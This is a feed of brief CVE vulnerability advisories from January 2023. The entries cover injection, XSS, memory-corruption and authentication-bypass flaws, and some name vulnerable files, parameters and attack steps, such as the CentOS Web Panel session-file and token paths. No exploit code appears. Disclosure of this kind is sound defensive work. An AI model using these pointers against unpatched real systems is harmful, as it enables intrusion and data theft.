🚨 CVE-2022-46891An issue was discovered in the Arm Mali GPU Kernel Driver. There is a use-after-free. A non-privileged user can make improper GPU processing operations to gain access to already freed memory. This affects Midgard r13p0 through r32p0, Bifrost r1p0 through r40p0, and Valhall r19p0 through r40p0.🎖@cveNotify |
|
| 2023-01-25 00:29:49 |
🚨 CVE-2023-22278m-FILTER prior to Ver.5.70R01 (Ver.5 Series) and m-FILTER prior to Ver.4.87R04 (Ver.4 Series) allows a remote unauthenticated attacker to bypass authentication and send users' unintended email when email is being sent under the certain conditions. The attacks exploiting this vulnerability have been observed.🎖@cveNotify |
|
| 2023-01-25 00:29:46 |
🚨 CVE-2023-22279MAHO-PBX NetDevancer Lite/Uni/Pro/Cloud prior to Ver.1.11.00, MAHO-PBX NetDevancer VSG Lite/Uni prior to Ver.1.11.00, and MAHO-PBX NetDevancer MobileGate Home/Office prior to Ver.1.11.00 allow a remote unauthenticated attacker to execute an arbitrary OS command.🎖@cveNotify |
|
| 2023-01-25 00:29:45 |
🚨 CVE-2023-22280MAHO-PBX NetDevancer Lite/Uni/Pro/Cloud prior to Ver.1.11.00, MAHO-PBX NetDevancer VSG Lite/Uni prior to Ver.1.11.00, and MAHO-PBX NetDevancer MobileGate Home/Office prior to Ver.1.11.00 allow a remote authenticated attacker with an administrative privilege to execute an arbitrary OS command.🎖@cveNotify |
|
| 2023-01-25 00:29:43 |
🚨 CVE-2023-0158NLnet Labs Krill supports direct access to the RRDP repository content through its built-in web server at the "/rrdp" endpoint. Prior to 0.12.1 a direct query for any existing directory under "/rrdp/", rather than an RRDP file such as "/rrdp/notification.xml" as would be expected, causes Krill to crash. If the built-in "/rrdp" endpoint is exposed directly to the internet, then malicious remote parties can cause the publication server to crash. The repository content is not affected by this, but the availability of the server and repository can cause issues if this attack is persistent and is not mitigated.🎖@cveNotify |
|
| 2023-01-25 00:29:42 |
🚨 CVE-2022-4621Panasonic Sanyo CCTV Network Cameras versions 1.02-05 and 2.03-0x are vulnerable to CSRFs that can be exploited to allow an attacker to perform changes with administrator level privileges.🎖@cveNotify |
|
| 2023-01-25 00:29:40 |
🚨 CVE-2023-22357Active debug code exists in OMRON CP1L-EL20DR-D all versions, which may lead to a command that is not specified in FINS protocol being executed without authentication. A remote unauthenticated attacker may read/write in arbitrary area of the device memory, which may lead to overwriting the firmware, causing a denial-of-service (DoS) condition, and/or arbitrary code execution.🎖@cveNotify |
|
| 2023-01-25 00:29:39 |
🚨 CVE-2023-22366CX-Motion-MCH v2.32 and earlier contains an access of uninitialized pointer vulnerability. Having a user to open a specially crafted project file may lead to information disclosure and/or arbitrary code execution.🎖@cveNotify |
|
| 2023-01-24 22:29:37 |
🚨 CVE-2022-41859In freeradius, the EAP-PWD function compute_password_element() leaks information about the password which allows an attacker to substantially reduce the size of an offline dictionary attack.🎖@cveNotify |
|
| 2023-01-24 22:29:36 |
🚨 CVE-2022-4464Themify Portfolio Post WordPress plugin before 1.2.1 does not validate and escapes some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as a contributor to perform Stored Cross-Site Scripting attacks, which could be used against high privileged users such as admin.🎖@cveNotify |
|
| 2023-01-24 20:29:59 |
🚨 CVE-2018-5961CentOS-WebPanel.com (aka CWP) CentOS Web Panel through v0.9.8.12 has XSS via the `module` value of the `index.php` file.🎖@cveNotify |
|
| 2023-01-24 20:29:58 |
🚨 CVE-2018-18322CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.480 has Command Injection via shell metacharacters in the admin/index.php service_start, service_restart, service_fullstatus, or service_stop parameter.🎖@cveNotify |
|
| 2023-01-24 20:29:57 |
🚨 CVE-2019-15235CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.864 allows an attacker to get a victim's session file name from /home/[USERNAME]/tmp/session/sess_xxxxxx, and the victim's token value from /usr/local/cwpsrv/logs/access_log, then use them to gain access to the victim's password (for the OS and phpMyAdmin) via an attacker account. This is different from CVE-2019-14782.🎖@cveNotify |
|
| 2023-01-24 20:29:56 |
🚨 CVE-2020-15429This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_crons.php. When parsing the user parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9716.🎖@cveNotify |
|
| 2023-01-24 20:29:52 |
🚨 CVE-2020-15422This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_mod_security.php. When parsing the archivo parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9731.🎖@cveNotify |
|
| 2023-01-24 20:29:51 |
🚨 CVE-2019-13359In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.836, a cwpsrv-xxx cookie allows a normal user to craft and upload a session file to the /tmp directory, and use it to become the root user.🎖@cveNotify |
|
| 2023-01-24 20:29:50 |
🚨 CVE-2020-15620This vulnerability allows remote attackers to disclose sensitive information on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_list_accounts.php. When parsing the id parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-9741.🎖@cveNotify |
|
| 2023-01-24 20:29:49 |
🚨 CVE-2020-15435This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_dashboard.php. When parsing the service_start parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9719.🎖@cveNotify |
|
| 2023-01-24 20:29:45 |
🚨 CVE-2019-14729In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to delete a sub-domain from a victim's account via an attacker account.🎖@cveNotify |
|
| 2023-01-24 20:29:44 |
🚨 CVE-2020-15616This vulnerability allows remote attackers to disclose sensitive information on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_list_accounts.php. When parsing the package parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-9706.🎖@cveNotify |
|
| 2023-01-24 20:29:43 |
🚨 CVE-2019-14726In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to access and delete DNS records of a victim's account via an attacker account.🎖@cveNotify |
|
| 2023-01-24 20:29:42 |
🚨 CVE-2020-15434This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_php_pecl.php. When parsing the canal parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9745.🎖@cveNotify |
|
| 2023-01-24 20:29:38 |
🚨 CVE-2020-15427This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_disk_usage.php. When parsing the folderName parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9713.🎖@cveNotify |
|
| 2023-01-24 20:29:37 |
🚨 CVE-2019-13605In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.838 to 0.9.8.846, remote attackers can bypass authentication in the login process by leveraging the knowledge of a valid username. The attacker must defeat an encoding that is not equivalent to base64, and thus this is different from CVE-2019-13360.🎖@cveNotify |
|
| 2023-01-24 20:29:36 |
🚨 CVE-2019-13383In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.846, the Login process allows attackers to check whether a username is valid by reading the HTTP response.🎖@cveNotify |
|
| 2023-01-24 20:29:35 |
🚨 CVE-2018-18324CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.480 has XSS via the admin/fileManager2.php fm_current_dir parameter, or the admin/index.php module, service_start, service_fullstatus, service_restart, service_stop, or file (within the file_editor) parameter.🎖@cveNotify |
|
| 2023-01-24 18:30:13 |
🚨 CVE-2020-5791Improper neutralization of special elements used in an OS command in Nagios XI 5.7.3 allows a remote, authenticated admin user to execute operating system commands with the privileges of the apache user.🎖@cveNotify |
|
| 2023-01-24 18:30:12 |
🚨 CVE-2020-8140A code injection in Nextcloud Desktop Client 2.6.2 for macOS allowed to load arbitrary code when starting the client with DYLD_INSERT_LIBRARIES set in the environment.🎖@cveNotify |
|
| 2023-01-24 18:30:11 |
🚨 CVE-2019-16775Versions of the npm CLI prior to 6.13.3 are vulnerable to an Arbitrary File Write. It is possible for packages to create symlinks to files outside of thenode_modules folder through the bin field upon installation. A properly constructed entry in the package.json bin field would allow a package publisher to create a symlink pointing to arbitrary files on a user's system when the package is installed. This behavior is still possible through install scripts. This vulnerability bypasses a user using the --ignore-scripts install option.🎖@cveNotify |
|
| 2023-01-24 18:30:10 |
🚨 CVE-2018-0315A vulnerability in the authentication, authorization, and accounting (AAA) security services of Cisco IOS XE Software could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device or cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerability is due to incorrect memory operations that the affected software performs when the software parses a username during login authentication. An attacker could exploit this vulnerability by attempting to authenticate to an affected device. A successful exploit could allow the attacker to execute arbitrary code on the affected device or cause the affected device to reload, resulting in a DoS condition. This vulnerability affects Cisco devices that are running Cisco IOS XE Software Release Fuji 16.7.1 or Fuji 16.8.1 and are configured to use AAA for login authentication. Cisco Bug IDs: CSCvi25380.🎖@cveNotify |
|
| 2023-01-24 18:30:05 |
🚨 CVE-2015-10053A vulnerability classified as critical has been found in prodigasistemas curupira up to 0.1.3. Affected is an unknown function of the file app/controllers/curupira/passwords_controller.rb. The manipulation leads to sql injection. Upgrading to version 0.1.4 is able to address this issue. The name of the patch is 93a9a77896bb66c949acb8e64bceafc74bc8c271. It is recommended to upgrade the affected component. VDB-218394 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-24 18:30:04 |
🚨 CVE-2016-6664mysqld_safe in Oracle MySQL through 5.5.51, 5.6.x through 5.6.32, and 5.7.x through 5.7.14; MariaDB; Percona Server before 5.5.51-38.2, 5.6.x before 5.6.32-78-1, and 5.7.x before 5.7.14-8; and Percona XtraDB Cluster before 5.5.41-37.0, 5.6.x before 5.6.32-25.17, and 5.7.x before 5.7.14-26.17, when using file-based logging, allows local users with access to the mysql account to gain root privileges via a symlink attack on error logs and possibly other files.🎖@cveNotify |
|
| 2023-01-24 18:30:03 |
🚨 CVE-2014-3394The Smart Call Home (SCH) implementation in Cisco ASA Software 8.2 before 8.2(5.50), 8.4 before 8.4(7.15), 8.6 before 8.6(1.14), 8.7 before 8.7(1.13), 9.0 before 9.0(4.8), and 9.1 before 9.1(5.1) allows remote attackers to bypass certificate validation via an arbitrary VeriSign certificate, aka Bug ID CSCun10916.🎖@cveNotify |
|
| 2023-01-24 18:30:02 |
🚨 CVE-2009-3732Format string vulnerability in vmware-vmrc.exe build 158248 in VMware Remote Console (aka VMrc) allows remote attackers to execute arbitrary code via unspecified vectors.🎖@cveNotify |
|
| 2023-01-24 18:29:58 |
🚨 CVE-2022-45438When explicitly enabling the feature flag DASHBOARD_CACHE (disabled by default), the system allowed for an unauthenticated user to access dashboard configuration metadata using a REST API Get endpoint. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.🎖@cveNotify |
|
| 2023-01-24 18:29:57 |
🚨 CVE-2021-39027IBM Guardium Data Encryption (GDE) 4.0.0 and 5.0.0 prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved. IBM X-Force ID: 213865.🎖@cveNotify |
|
| 2023-01-24 18:29:56 |
🚨 CVE-2022-1388On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated🎖@cveNotify |
|
| 2023-01-24 18:29:55 |
🚨 CVE-2022-27636On F5 BIG-IP APM 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all versions of 12.1.x and 11.6.x, as well as F5 BIG-IP APM Clients 7.x versions prior to 7.2.1.5, BIG-IP Edge Client may log sensitive APM session-related information when VPN is launched on a Windows system. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated🎖@cveNotify |
|
| 2023-01-24 18:29:54 |
🚨 CVE-2022-0808Use after free in Chrome OS Shell in Google Chrome on Chrome OS prior to 99.0.4844.51 allowed a remote attacker who convinced a user to engage in a series of user interaction to potentially exploit heap corruption via user interactions.🎖@cveNotify |
|
| 2023-01-24 18:29:50 |
🚨 CVE-2021-32503Unauthenticated users can access sensitive web URLs through GET request, which should be restricted to maintenance users only. A malicious attacker could use this sensitive information’s to launch further attacks on the system.🎖@cveNotify |
|
| 2023-01-24 18:29:49 |
🚨 CVE-2021-31000A permissions issue was addressed with improved validation. This issue is fixed in iOS 15.2 and iPadOS 15.2, watchOS 8.3, macOS Monterey 12.1, tvOS 15.2. A malicious application may be able to read sensitive contact information.🎖@cveNotify |
|
| 2023-01-24 18:29:48 |
🚨 CVE-2022-29957The Emerson DeltaV Distributed Control System (DCS) through 2022-04-29 mishandles authentication. It utilizes several proprietary protocols for a wide variety of functionality. These protocols include Firmware upgrade (18508/TCP, 18518/TCP); Plug-and-Play (18510/UDP); Hawk services (18507/UDP); Management (18519/TCP); Cold restart (18512/UDP); SIS communications (12345/TCP); and Wireless Gateway Protocol (18515/UDP). None of these protocols have any authentication features, allowing any attacker capable of communicating with the ports in question to invoke (a subset of) desired functionality.🎖@cveNotify |
|
| 2023-01-24 18:29:47 |
🚨 CVE-2022-22497IBM Aspera Faspex 4.4.1 and 5.0.0 could allow unauthorized access due to an incorrectly computed security token. IBM X-Force ID: 226951.🎖@cveNotify |
|
| 2023-01-24 18:29:46 |
🚨 CVE-2022-29518Screen Creator Advance2, HMI GC-A2 series, and Real time remote monitoring and control tool Screen Creator Advance2 versions prior to Ver.0.1.1.3 Build01, HMI GC-A2 series(GC-A22W-CW, GC-A24W-C(W), GC-A26W-C(W), GC-A24, GC-A24-M, GC-A25, GC-A26, and GC-A26-J2), and Real time remote monitoring and control tool(Remote GC) allows a local attacker to bypass authentication due to the improper check for the Remote control setting's account names. This may allow attacker who can access the HMI from Real time remote monitoring and control tool may perform arbitrary operations on the HMI. As a result, the information stored in the HMI may be disclosed, deleted or altered, and/or the equipment may be illegally operated via the HMI.🎖@cveNotify |
|
| 2023-01-24 15:29:47 |
🚨 CVE-2023-0313Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.10.🎖@cveNotify |
|
| 2023-01-24 15:29:46 |
🚨 CVE-2023-0312Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.10.🎖@cveNotify |
|
| 2023-01-24 15:29:45 |
🚨 CVE-2014-125079A vulnerability was found in agy pontifex.http. It has been declared as critical. This vulnerability affects unknown code of the file lib/Http.coffee. The manipulation leads to sql injection. Upgrading to version 0.1.0 is able to address this issue. The name of the patch is e52a758f96861dcef2dabfecb9da191bb2e07761. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218356.🎖@cveNotify |
|
| 2023-01-24 15:29:44 |
🚨 CVE-2015-10044A vulnerability classified as critical was found in gophergala sqldump. This vulnerability affects unknown code. The manipulation leads to sql injection. The name of the patch is 76db54e9073b5248b8863e71a63d66a32d567d21. It is recommended to apply a patch to fix this issue. VDB-218350 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-24 15:29:40 |
🚨 CVE-2016-4180Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-4179, CVE-2016-4181, CVE-2016-4182, CVE-2016-4183, CVE-2016-4184, CVE-2016-4185, CVE-2016-4186, CVE-2016-4187, CVE-2016-4188, CVE-2016-4189, CVE-2016-4190, CVE-2016-4217, CVE-2016-4218, CVE-2016-4219, CVE-2016-4220, CVE-2016-4221, CVE-2016-4233, CVE-2016-4234, CVE-2016-4235, CVE-2016-4236, CVE-2016-4237, CVE-2016-4238, CVE-2016-4239, CVE-2016-4240, CVE-2016-4241, CVE-2016-4242, CVE-2016-4243, CVE-2016-4244, CVE-2016-4245, and CVE-2016-4246.🎖@cveNotify |
|
| 2023-01-24 15:29:39 |
🚨 CVE-2016-4181Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-4179, CVE-2016-4180, CVE-2016-4182, CVE-2016-4183, CVE-2016-4184, CVE-2016-4185, CVE-2016-4186, CVE-2016-4187, CVE-2016-4188, CVE-2016-4189, CVE-2016-4190, CVE-2016-4217, CVE-2016-4218, CVE-2016-4219, CVE-2016-4220, CVE-2016-4221, CVE-2016-4233, CVE-2016-4234, CVE-2016-4235, CVE-2016-4236, CVE-2016-4237, CVE-2016-4238, CVE-2016-4239, CVE-2016-4240, CVE-2016-4241, CVE-2016-4242, CVE-2016-4243, CVE-2016-4244, CVE-2016-4245, and CVE-2016-4246.🎖@cveNotify |
|
| 2023-01-24 15:29:38 |
🚨 CVE-2022-25046A path traversal vulnerability in loader.php of CWP v0.9.8.1122 allows attackers to execute arbitrary code via a crafted POST request.🎖@cveNotify |
|
| 2023-01-24 12:29:47 |
🚨 CVE-2022-4554B2B Customer Ordering System developed by ID Software Project and Consultancy Services before version 1.0.0.347 has an authenticated Reflected XSS vulnerability. This has been fixed in the version 1.0.0.347.🎖@cveNotify |
|
| 2023-01-24 07:29:50 |
🚨 CVE-2020-5313libImaging/FliDecode.c in Pillow before 6.2.2 has an FLI buffer overflow.🎖@cveNotify |
|
| 2023-01-24 07:29:46 |
🚨 CVE-2020-5310libImaging/TiffDecode.c in Pillow before 6.2.2 has a TIFF decoding integer overflow, related to realloc.🎖@cveNotify |
|
| 2023-01-24 07:29:45 |
🚨 CVE-2022-41955Autolab is a course management service, initially developed by a team of students at Carnegie Mellon University, that enables instructors to offer autograded programming assignments to their students over the Web. A remote code execution vulnerability was discovered in Autolab's MOSS functionality, whereby an instructor with access to the feature might be able to execute code on the server hosting Autolab. This vulnerability has been patched in version 2.10.0. As a workaround, disable the MOSS feature if it is unneeded by replacing the body of `run_moss` in `app/controllers/courses_controller.rb` with `render(plain: "Feature disabled", status: :bad_request) && return`.🎖@cveNotify |
|
| 2023-01-24 07:29:44 |
🚨 CVE-2023-23331Amano Xoffice parking solutions 7.1.3879 is vulnerable to SQL Injection.🎖@cveNotify |
|
| 2023-01-23 22:30:12 |
🚨 CVE-2022-3928Hardcoded credential is found in affected products' message queue. An attacker that manages to exploit this vulnerability will be able to access data to the internal message queue. This issue affects * FOXMAN-UN product: FOXMAN-UN R15B, FOXMAN-UN R15A, FOXMAN-UN R14B, FOXMAN-UN R14A, FOXMAN-UN R11B, FOXMAN-UN R11A, FOXMAN-UN R10C, FOXMAN-UN R9C; * UNEM product: UNEM R15B, UNEM R15A, UNEM R14B, UNEM R14A, UNEM R11B, UNEM R11A, UNEM R10C, UNEM R9C. List of CPEs: * cpe:2.3:a:hitachienergy:foxman-un:R15B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R15A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R14B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R14A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R11B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R11A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R10C:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R9C:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R15B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R15A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R14B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R14A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R11B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R11A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R10C:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R9C:*:*:*:*:*:*:*🎖@cveNotify |
|
| 2023-01-23 22:30:11 |
🚨 CVE-2022-3929Communication between the client and the server application of the affected products is partially done using CORBA (Common Object Request Broker Architecture) over TCP/IP. This protocol is not encrypted and allows tracing of internal messages. This issue affects * FOXMAN-UN product: FOXMAN-UN R15B, FOXMAN-UN R15A, FOXMAN-UN R14B, FOXMAN-UN R14A, FOXMAN-UN R11B, FOXMAN-UN R11A, FOXMAN-UN R10C, FOXMAN-UN R9C; * UNEM product: UNEM R15B, UNEM R15A, UNEM R14B, UNEM R14A, UNEM R11B, UNEM R11A, UNEM R10C, UNEM R9C. List of CPEs: * cpe:2.3:a:hitachienergy:foxman-un:R15B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R15A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R14B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R14A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R11B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R11A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R10C:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R9C:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R15B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R15A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R14B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R14A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R11B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R11A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R10C:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R9C:*:*:*:*:*:*:*🎖@cveNotify |
|
| 2023-01-23 22:30:10 |
🚨 CVE-2023-22852Tiki through 25.0 allows CSRF attacks that are related to tiki-importer.php and tiki-import_sheet.php.🎖@cveNotify |
|
| 2023-01-23 22:30:09 |
🚨 CVE-2015-10042** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical was found in Dovgalyuk AIBattle. Affected by this vulnerability is the function registerUser of the file site/procedures.php. The manipulation of the argument postLogin leads to sql injection. The name of the patch is 448e9880aac18ae7832f8d065e03e46ce0f1d3e3. It is recommended to apply a patch to fix this issue. The identifier VDB-218305 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-01-23 22:30:05 |
🚨 CVE-2022-41395Tenda AC1200 Router Model W15Ev2 V15.11.0.10(1576) was discovered to contain a command injection vulnerability via the dmzHost parameter in the setDMZ function.🎖@cveNotify |
|
| 2023-01-23 22:30:04 |
🚨 CVE-2022-42058Tenda AC1200 Router Model W15Ev2 V15.11.0.10(1576) was discovered to contain a stack overflow via the setRemoteWebManage function. This vulnerability allows attackers to cause a Denial of Service (DoS) via crafted overflow data.🎖@cveNotify |
|
| 2023-01-23 22:30:03 |
🚨 CVE-2022-42060Tenda AC1200 Router Model W15Ev2 V15.11.0.10(1576) was discovered to contain a stack overflow via the setWanPpoe function. This vulnerability allows attackers to cause a Denial of Service (DoS) via crafted overflow data.🎖@cveNotify |
|
| 2023-01-23 22:30:02 |
🚨 CVE-2021-40341DES cipher, which has inadequate encryption strength, is used Hitachi Energy FOXMAN-UN to encrypt user credentials used to access the Network Elements. Successful exploitation allows sensitive information to be decrypted easily. This issue affects * FOXMAN-UN product: FOXMAN-UN R16A, FOXMAN-UN R15B, FOXMAN-UN R15A, FOXMAN-UN R14B, FOXMAN-UN R14A, FOXMAN-UN R11B, FOXMAN-UN R11A, FOXMAN-UN R10C, FOXMAN-UN R9C; * UNEM product: UNEM R16A, UNEM R15B, UNEM R15A, UNEM R14B, UNEM R14A, UNEM R11B, UNEM R11A, UNEM R10C, UNEM R9C. List of CPEs: * cpe:2.3:a:hitachienergy:foxman-un:R16A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R15B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R15A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R14B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R14A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R11B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R11A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R10C:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R9C:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R16A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R15B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R15A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R14B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R14A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R11B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R11A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R10C:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R9C:*:*:*:*:*:*:*🎖@cveNotify |
|
| 2023-01-23 22:29:58 |
🚨 CVE-2022-3091RONDS EPM version 1.19.5 has a vulnerability in which a function could allow unauthenticated users to leak credentials. In some circumstances, an attacker can exploit this vulnerability to execute operating system (OS) commands.🎖@cveNotify |
|
| 2023-01-23 22:29:57 |
🚨 CVE-2023-0338Cross-site Scripting (XSS) - Reflected in GitHub repository lirantal/daloradius prior to master-branch.🎖@cveNotify |
|
| 2023-01-23 22:29:56 |
🚨 CVE-2022-41858A flaw was found in the Linux kernel. A NULL pointer dereference may occur while a slip driver is in progress to detach in sl_tx_timeout in drivers/net/slip/slip.c. This issue could allow an attacker to crash the system or leak internal kernel information.🎖@cveNotify |
|
| 2023-01-23 22:29:52 |
🚨 CVE-2022-46475D-Link DIR 645A1 1.06B01_Beta01 was discovered to contain a stack overflow via the service= variable in the genacgi_main function.🎖@cveNotify |
|
| 2023-01-23 22:29:51 |
🚨 CVE-2023-0122A NULL pointer dereference vulnerability in the Linux kernel NVMe functionality, in nvmet_setup_auth(), allows an attacker to perform a Pre-Auth Denial of Service (DoS) attack on a remote machine. Affected versions v6.0-rc1 to v6.0-rc3, fixed in v6.0-rc4.🎖@cveNotify |
|
| 2023-01-23 22:29:50 |
🚨 CVE-2023-22624Zoho ManageEngine Exchange Reporter Plus before 5708 allows attackers to conduct XXE attacks.🎖@cveNotify |
|
| 2023-01-23 20:30:01 |
🚨 CVE-2022-47943An issue was discovered in ksmbd in the Linux kernel 5.15 through 5.19 before 5.19.2. There is an out-of-bounds read and OOPS for SMB2_WRITE, when there is a large length in the zero DataOffset case.🎖@cveNotify |
|
| 2023-01-23 20:30:00 |
🚨 CVE-2022-47942An issue was discovered in ksmbd in the Linux kernel 5.15 through 5.19 before 5.19.2. There is a heap-based buffer overflow in set_ntacl_dacl, related to use of SMB2_QUERY_INFO_HE after a malformed SMB2_SET_INFO_HE command.🎖@cveNotify |
|
| 2023-01-23 20:29:59 |
🚨 CVE-2023-0294The Mediamatic – Media Library Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.8.1. This is due to missing or incorrect nonce validation on its AJAX actions function. This makes it possible for unauthenticated attackers to change image categories used by the plugin, via forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-01-23 20:29:58 |
🚨 CVE-2023-0295The Launchpad plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several of its settings parameters in versions up to, and including, 1.0.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2023-01-23 20:29:54 |
